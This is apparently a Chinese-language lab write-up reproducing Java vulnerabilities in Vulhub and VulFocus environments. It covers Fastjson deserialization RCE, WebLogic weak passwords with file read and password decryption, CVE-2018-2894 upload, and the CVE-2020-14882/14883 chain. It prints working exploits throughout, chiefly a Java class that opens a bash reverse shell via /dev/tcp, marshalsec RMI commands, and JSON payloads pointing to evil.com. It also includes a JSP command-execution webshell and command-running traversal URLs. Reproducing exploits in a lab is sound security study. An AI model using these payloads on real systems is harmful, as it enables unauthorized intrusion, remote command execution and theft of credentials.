Java安全-Java Vuls（Fastjson、Weblogic漏洞复现）

复现几个 Java 的漏洞，文章会分多篇这是第一篇，文章会分组件和中间件两个角度进行漏洞复现

复现使用环境

1. Vulhub
2. VulFocus

组件

Fastjson 1.2.24 反序列化 RCE

FastJson 库是 Java 的一个 Json 库，其作用是将 Java 对象转换成 json 数据来表示，也可以将 json 数据转换成 Java 对象

在 1.2.24 版本的 Fastjson 出现了一个反序列化的漏洞，fastjson 在解析 json 的过程中，支持使用 autoType 来实例化某一个具体的类，并调用该类的 set/get 方法来访问属性

因为目标环境是 Java 8u102，没有 com.sun.jndi.rmi.object.trustURLCodebase 的限制，我们可以使用 com.sun.rowset.JdbcRowSetImpl 的利用链，借助 JNDI 注入来执行命令，漏洞利用过程与 Log4j、jackson jdni 注入一致

1.创建恶意类并生成 class 字节码文件

import java.lang.Runtime;
import java.lang.Process;

public class Test {
    
    
   static {
    
    
       try {
    
    
          Runtime r = Runtime.getRuntime();
          Process p = r.exec(new String[]{
    
    "/bin/bash","-c","bash -i >& /dev/tcp/IP/PORT 0>&1"});
          p.waitFor();
       } catch (Exception e) {
    
    
           // do nothing
       }
   }
}

注意代码中 IP 为 VPS IP 端口为 NC 监听端口，在命令行中使用命令生成字节码文件

2.将字节码文件上传至 VPS，使用 python 开一个 web 服务，确保可以下载 class 文件

python3 -m http.server 8888

3.借助 marshalsec 项目，启动一个 RMI 服务器，监听9999 端口，并制定加载远程类 Test.class

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999

4.向靶场服务器发送 Payload，带上 RMI 的地址：

POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/TouchFile",
        "autoCommit":true
    }
}

特别注意：在 Java 漏洞复现中需要特别注意 HTTP 请求头真的会影响，所以复现中使用上面代码块中的 payload

如果直接是 burp 抓包，改请求方式，不会利用成功，如下图，因为 Content-Type 不对

执行步骤如图所示

正是因为在 vps 上需要开三个服务所以显得很乱

Fastjson 1.2.47 反序列化 RCE

Fastjson 于 1.2.24 版本后增加了反序列化白名单，而在 1.2.48 以前的版本中，攻击者可以利用特殊构造的 json 字符串绕过白名单检测，成功执行任意命令

环境用 vulhub

执行如下命令启动一个spring web项目，其中使用 fastjson 作为默认 json 解析器：

docker-compose up -d

环境启动后，访问http://your-ip:8090即可看到一个json对象被返回，我们将content-type修改为application/json后可向其POST新的JSON对象，后端会利用fastjson进行解析

vulhub 提供的目标环境是openjdk:8u102，这个版本没有com.sun.jndi.rmi.object.trustURLCodebase的限制，可以使用 rmi 进行命令执行

复现方法一致，payload 利用其缓存机制可实现对未开启 autotype 功能的绕过

{
    
    
    "a":{
    
    
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
    
    
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/Exploit",
        "autoCommit":true
    }
}

中间件

weblogic 漏洞不止这几个

Weblogic 文件读取&war包上传（Vulhub）

环境所在 vulhub 目录，weblogic 挺大的可以用 vulfocus 的环境

/vulhub-master/weblogic/weak_password

开启环境后，访问http://your-ip:7001/console，即为weblogic后台

记录以下这个样子

环境存在弱口令：

• weblogic
• Oracle@123

weblogic常用弱口令： http://cirt.net/passwords?criteria=weblogic

如果存在弱口令就可以直接进入后台上传 war 部署后门就行了，这也是 Java 中间件普遍利用方法

这套环境模拟了一个任意文件下载漏洞，对并不是说 weblogic 的任意文件读取

http://your-ip:7001/hello/file.jsp?path=/etc/passwd

尝试读取敏感文件

weblogic密码使用AES（老版本3DES）加密，对称加密可解密，只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下，名为SerializedSystemIni.dat和config.xml，在本环境中为./security/SerializedSystemIni.dat和./config/config.xml（基于当前目录/root/Oracle/Middleware/user_projects/domains/base_domain）

尝试读取 SerializedSystemIni.dat 这是一个二进制文件，所以一定要用 burpsuite 来读取，用浏览器直接下载可能引入一些干扰字符。在 burp 里选中读取到的那一串乱码，右键 copy to file 就可以保存成一个文件

config/config.xml是 base_domain 的全局配置文件，所以乱七八糟的内容比较多，找到其中的<node-manager-password-encrypted>的值，即为加密后的管理员密码

对于这个密码在 vulhub 的环境中也提供了解密工具，GitHub 上也有整理好的工具，链接

weblogic_decrypt.jar

这个工具要和 lib 在一个目录启动

密码一致，解密成功，可以登录后台上传 webshell

1.首先生成后门 test.jsp

<%
    if("123".equals(request.getParameter("pwd"))){
    
    
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
    
    
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

构造 war 包

jar cvf test.war test.jsp

值得注意的是，我们平时 tomcat 用的 war 包不一定能够成功，你可以将你的 webshell 放到本项目的 web/hello.war 这个压缩包中

使用这种方法要注意应用目录在 war 包中 WEB-INF/weblogic.xml 里指定（因为本测试环境已经使用了/hello这个目录，所以你要在本测试环境下部署 shell，需要修改这个目录，比如修改成其他的）

进入后台，部署，点击安装

点击上载文件，选择文件

存放路径

/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/upload/test.war

一路 next 直到完成部署，访问后门

Weblogic 任意文件上传 CVE-2018-2894

WebLogic 管理端未授权的两个页面存在任意上传 getshell 漏洞，可直接获取权限。两个页面分别为 /ws_utc/begin.do，/ws_utc/config.do，Web Service Test Page，在 “生产模式” 下默认不开启，所以该漏洞有一定限制

环境启动后，访问http://your-ip:7001/console，即可看到后台登录页面。

执行docker-compose logs | grep password可查看管理员密码，管理员用户名为weblogic

登录后台页面，点击base_domain的配置，在“高级”中开启“启用 Web 服务测试页”选项，开启了的就存在此漏洞了

漏洞存在于 http://your-ip:7001/ws_utc/config.do

可以发现此界面访问无需登录，设置 Work Home Dir为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

将目录设置为ws_utc应用的静态文件css目录，访问这个目录是无需权限的，这一点很重要

然后点击安全 -> 增加，然后上传 webshell，并抓包

查看返回包

或者不抓包上传后 F12 审查元素

然后访问

 http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]

直接可以执行命令了，weblogic 真养活半个安全圈

Weblogic 管理控制台未授权远程命令执行漏洞（CVE-2020-14882，CVE-2020-14883）

CVE-2020-14882 允许未授权的用户绕过管理控制台的权限验证访问后台，CVE-2020-14883 允许后台任意用户通过 HTTP 协议执行任意命令。使用这两个漏洞组成的利用链，可通过一个 GET 请求在远程 Weblogic 服务器上以未授权的任意用户身份执行命令

复现环境使用 vulfocus

1.首先测试权限绕过漏洞（CVE-2020-14882），访问以下URL，即可未授权访问到管理后台页面：

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal

登录之后目前是权限最低的用户，无法安装应用也无法执行代码

2.利用到第二个漏洞CVE-2020-14883 通过 HTTP 协议执行任意命令。这个漏洞的利用方式有两种：

1. 通过com.tangosol.coherence.mvel2.sh.ShellSession

   直接访问如下URL，即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令

   http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")
   

   这个利用方法只能在 Weblogic 12.2.1 以上版本利用，因为 10.3.6 并不存在com.tangosol.coherence.mvel2.sh.ShellSession类

2. 通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

   这是一种更为通杀的方法，最早在 CVE-2019-2725 被提出，对于所有 Weblogic 版本均有效。

   首先，我们需要构造一个XML文件，并将其保存在Weblogic可以访问到的服务器上，如http://example.com/rce.xml：

   <?xml version="1.0" encoding="UTF-8" ?>
   <beans xmlns="http://www.springframework.org/schema/beans"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
       <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
           <constructor-arg>
             <list>
               <value>bash</value>
               <value>-c</value>
               <value><![CDATA[touch /tmp/success2]]></value>
             </list>
           </constructor-arg>
       </bean>
   </beans>
   

   然后通过如下URL，即可让Weblogic加载这个XML，并执行其中的命令：

   http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")
   

   

   这个利用方法也有自己的缺点，就是需要Weblogic的服务器能够访问到恶意XML

参考：
https://vulhub.org
文章很大部分摘录于此